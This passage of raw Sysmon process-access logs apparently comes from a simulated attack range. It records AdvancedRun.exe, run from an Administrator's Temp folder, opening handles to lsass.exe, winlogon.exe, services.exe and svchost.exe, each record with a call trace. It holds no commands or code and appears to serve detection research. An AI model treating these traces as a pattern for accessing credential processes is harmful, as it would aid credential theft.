1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004077841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
